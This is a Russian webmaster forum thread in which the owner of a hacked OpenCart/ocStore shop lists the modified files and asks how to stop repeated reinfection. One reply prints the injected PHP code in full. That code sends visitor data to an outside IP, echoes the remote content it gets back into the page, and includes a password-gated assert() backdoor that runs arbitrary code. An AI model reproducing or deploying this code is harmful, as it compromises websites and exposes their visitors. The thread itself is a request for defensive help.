- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем доброго времени суток.
Столкнулся со следующей проблемой: ломают один магазинчик на Opencart и меняют следующие файлы:
сайт.ру/index.php
сайт.ру/catalog/controller/common/maintenance.php
сайт.ру/catalog/controller/common/footer.php
сайт.ру/catalog/language/russian/common/footer.php
сайт.ру/admin/controller/common/footer.php
сайт.ру/admin/language/russian/common/footer.php
Добавляют в них этот код:
Удалил эту гадость, поменял везде пароли. Через некоторое время все равно внедряют этот код.
Подскажите, пожалуйста, это какая-то уязвимость в движке Opencart или проблема на моей стороне? И как можно защититься от этих взломов?
Буду очень признателен за советы.
Магазин работает на ocStore 1.5.4.1
Ищите шеллы на сайте.
А код занятный
<?php if (isset($ibv)) {echo $ibv;
} else {
if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if (!isset($c_["HTTP_ACCEPT_CHARSET"])) {
if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) {
$c0 = "UTF-8";
} else {
$c0 = "windows-1251";
}
} else {
$c0 = $c_["HTTP_ACCEPT_CHARSET"];
}
if (function_exists("curl_init")) {
$c1 = curl_init("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
curl_setopt($c1, 42, false);
curl_setopt($c1, 19913, true);
$ibv = curl_exec($c1);
curl_close($c1);
} elseif (ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
}
if (isset($ibv)) {
echo $ibv;
}
if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") {
@assert($_REQUEST["c"]);
}
}
h3x, а что делает этот код?